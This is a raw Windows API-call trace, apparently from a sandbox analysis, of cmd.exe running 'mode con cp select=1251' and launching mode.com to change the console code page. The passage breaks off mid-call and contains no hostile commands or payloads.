GetConsoleOutputCP () returned 0x1b5 [0032.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8abfe0 | out: lpCPInfo=0x4a8abfe0) returned 1 [0032.705] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.705] GetConsoleTitleW (in: lpConsoleTitle=0x28f510, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.705] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0032.705] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0032.705] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0032.705] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0032.705] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0032.705] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0032.705] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0032.705] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0032.705] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0032.705] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0032.705] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0032.705] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0032.705] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0032.705] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0032.705] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0032.705] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0032.705] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0032.705] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0032.705] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0032.705] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0032.706] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0032.706] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0032.706] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0032.706] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0032.706] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0032.706] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0032.706] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0032.706] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0032.706] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0032.706] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0032.706] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0032.706] _wcsicmp (_String1="mode", _String2="START") returned -6 [0032.706] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0032.706] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0032.706] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0032.706] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0032.706] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0032.706] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0032.706] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0032.706] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0032.706] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0032.706] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0032.706] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0032.706] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0032.706] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0032.706] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0032.706] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0032.706] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0032.706] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0032.706] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0032.706] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0032.706] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0032.706] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0032.706] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0032.706] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0032.706] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0032.706] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0032.706] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0032.706] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0032.707] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0032.707] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0032.707] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0032.707] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0032.707] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0032.707] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0032.707] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0032.707] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0032.707] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0032.707] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0032.707] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0032.707] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0032.707] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0032.707] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0032.707] _wcsicmp (_String1="mode", _String2="START") returned -6 [0032.707] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0032.707] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0032.707] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0032.707] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0032.707] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0032.707] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0032.707] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0032.707] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0032.707] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0032.707] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0032.707] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0032.707] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0032.707] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0032.707] GetProcessHeap () returned 0x2e0000 [0032.707] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2e1ab0 [0032.707] GetProcessHeap () returned 0x2e0000 [0032.707] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x42) returned 0x2f98a0 [0032.707] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0032.708] GetProcessHeap () returned 0x2e0000 [0032.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2f9a80 [0032.708] SetErrorMode (uMode=0x0) returned 0x0 [0032.708] SetErrorMode (uMode=0x1) returned 0x0 [0032.708] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f9a90, lpFilePart=0x28eda0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28eda0*="Desktop") returned 0x25 [0032.708] SetErrorMode (uMode=0x0) returned 0x1 [0032.708] GetProcessHeap () returned 0x2e0000 [0032.708] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9a80, Size=0x66) returned 0x2f9a80 [0032.708] GetProcessHeap () returned 0x2e0000 [0032.708] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9a80) returned 0x66 [0032.708] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.708] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.708] GetProcessHeap () returned 0x2e0000 [0032.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x128) returned 0x2e1cd0 [0032.708] GetProcessHeap () returned 0x2e0000 [0032.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x240) returned 0x2f9b00 [0032.714] GetProcessHeap () returned 0x2e0000 [0032.714] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9b00, Size=0x12a) returned 0x2f9b00 [0032.714] GetProcessHeap () returned 0x2e0000 [0032.714] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9b00) returned 0x12a [0032.714] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.714] GetProcessHeap () returned 0x2e0000 [0032.714] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f5b70 [0032.714] GetProcessHeap () returned 0x2e0000 [0032.714] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f5b70, Size=0x7e) returned 0x2f5b70 [0032.714] GetProcessHeap () returned 0x2e0000 [0032.714] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f5b70) returned 0x7e [0032.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.716] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0xffffffffffffffff [0032.716] GetLastError () returned 0x2 [0032.716] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0xffffffffffffffff [0032.716] GetLastError () returned 0x2 [0032.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.716] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0x2f5c00 [0032.717] GetProcessHeap () returned 0x2e0000 [0032.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x28) returned 0x2f4640 [0032.717] FindClose (in: hFindFile=0x2f5c00 | out: hFindFile=0x2f5c00) returned 1 [0032.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x28eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb10) returned 0x2f5c00 [0032.717] GetProcessHeap () returned 0x2e0000 [0032.717] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f4640, Size=0x8) returned 0x2f98f0 [0032.717] FindClose (in: hFindFile=0x2f5c00 | out: hFindFile=0x2f5c00) returned 1 [0032.717] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0032.717] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0032.717] GetConsoleTitleW (in: lpConsoleTitle=0x28f060, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.717] GetProcessHeap () returned 0x2e0000 [0032.717] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2f9c40 [0032.717] GetConsoleTitleW (in: lpConsoleTitle=0x2f9c50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.717] GetProcessHeap () returned 0x2e0000 [0032.717] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9c40, Size=0xa8) returned 0x2f9c40 [0032.717] GetProcessHeap () returned 0x2e0000 [0032.717] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9c40) returned 0xa8 [0032.717] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0032.718] GetProcessHeap () returned 0x2e0000 [0032.718] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9c40 | out: hHeap=0x2e0000) returned 1 [0032.718] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28edd8 | out: lpAttributeList=0x28ee18, lpSize=0x28edd8) returned 1 [0032.718] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee18, dwFlags=0x0, Attribute=0x60001, lpValue=0x28edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee18, lpPreviousValue=0x0) returned 1 [0032.718] GetStartupInfoW (in: lpStartupInfo=0x28ef30 | out: lpStartupInfo=0x28ef30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0032.718] GetProcessHeap () returned 0x2e0000 [0032.718] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0032.718] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.719] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.719] GetProcessHeap () returned 0x2e0000 [0032.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0032.719] GetProcessHeap () returned 0x2e0000 [0032.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f8900 [0032.719] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28ee50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee00 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x28ee00*(hProcess=0x54, hThread=0x50, dwProcessId=0x998, dwThreadId=0x99c)) returned 1 [0032.729] CloseHandle (hObject=0x50) returned 1 [0032.729] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0032.729] GetProcessHeap () returned 0x2e0000 [0032.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fc230 | out: hHeap=0x2e0000) returned 1 [0032.729] GetEnvironmentStringsW () returned 0x2faa10* [0032.729] GetProcessHeap () returned 0x2e0000 [0032.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xae8) returned 0x2fb500 [0032.729] FreeEnvironmentStringsW (penv=0x2faa10) returned 1 [0032.730] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0032.730] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0032.730] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x28e708, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x28e708, ReturnLength=0x0) returned 0x0 [0032.730] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdc000, lpBuffer=0x28e740, nSize=0x380, lpNumberOfBytesRead=0x28e700 | out: lpBuffer=0x28e740*, lpNumberOfBytesRead=0x28e700*=0x380) returned 1 [0032.730] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0033.134] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ed48 | out: lpExitCode=0x28ed48*=0x0) returned 1 [0033.134] CloseHandle (hObject=0x54) returned 1 [0033.134] _vsnwprintf (in: _Buffer=0x28efb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ed58 | out: _Buffer="00000000") returned 8 [0033.134] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0033.134] GetProcessHeap () returned 0x2e0000 [0033.134] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb500 | out: hHeap=0x2e0000) returned 1 [0033.134] GetEnvironmentStringsW () returned 0x2faa10* [0033.134] GetProcessHeap () returned 0x2e0000 [0033.134] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0e) returned 0x2feb10 [0033.134] FreeEnvironmentStringsW (penv=0x2faa10) returned 1 [0033.134] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0033.134] GetProcessHeap () returned 0x2e0000 [0033.134] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2feb10 | out: hHeap=0x2e0000) returned 1 [0033.134] GetEnvironmentStringsW () returned 0x2faa10* [0033.134] GetProcessHeap () returned 0x2e0000 [0033.134] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0e) returned 0x2feb10 [0033.134] FreeEnvironmentStringsW (penv=0x2faa10) returned 1 [0033.134] GetProcessHeap () returned 0x2e0000 [0033.134] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8900 | out: hHeap=0x2e0000) returned 1 [0033.134] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee18 | out: lpAttributeList=0x28ee18) [0033.137] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0033.138] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.138] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0033.138] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.138] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a89e194 | out: lpMode=0x4a89e194) returned 0 [0033.138] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.138] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a89e198 | out: lpMode=0x4a89e198) returned 0 [0033.138] GetConsoleOutputCP () returned 0x4e3 [0033.138] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a8abfe0 | out: lpCPInfo=0x4a8abfe0) returned 1 [0033.139] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9b00 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1cd0 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9a80 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f98a0 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1ab0 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.139] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f6510 | out: hHeap=0x2e0000) returned 1 [0033.139] GetProcessHeap () returned 0x2e0000 [0033.140] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0033.140] GetProcessHeap () returned 0x2e0000 [0033.140] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97e0 | out: hHeap=0x2e0000) returned 1 [0033.140] _vsnwprintf (in: _Buffer=0x4a8b6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f278 | out: _Buffer="\r\n") returned 2 [0033.140] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.140] GetFileType (hFile=0xf4) returned 0x3 [0033.140] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.140] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0033.140] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f248, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f248*=0x2, lpOverlapped=0x0) returned 1 [0033.140] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0033.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ac0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0033.140] _vsnwprintf (in: _Buffer=0x4a89eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f288 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0033.140] _vsnwprintf (in: _Buffer=0x4a89ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f288 | out: _Buffer=">") returned 1 [0033.140] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.140] GetFileType (hFile=0xf4) returned 0x3 [0033.140] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.140] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0033.140] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x28f278, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f278*=0x26, lpOverlapped=0x0) returned 1 [0033.140] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.140] GetFileType (hFile=0xe8) returned 0x3 [0033.140] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.140] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.140] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.140] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0033.140] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.140] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0033.141] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0033.141] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.141] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.141] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, 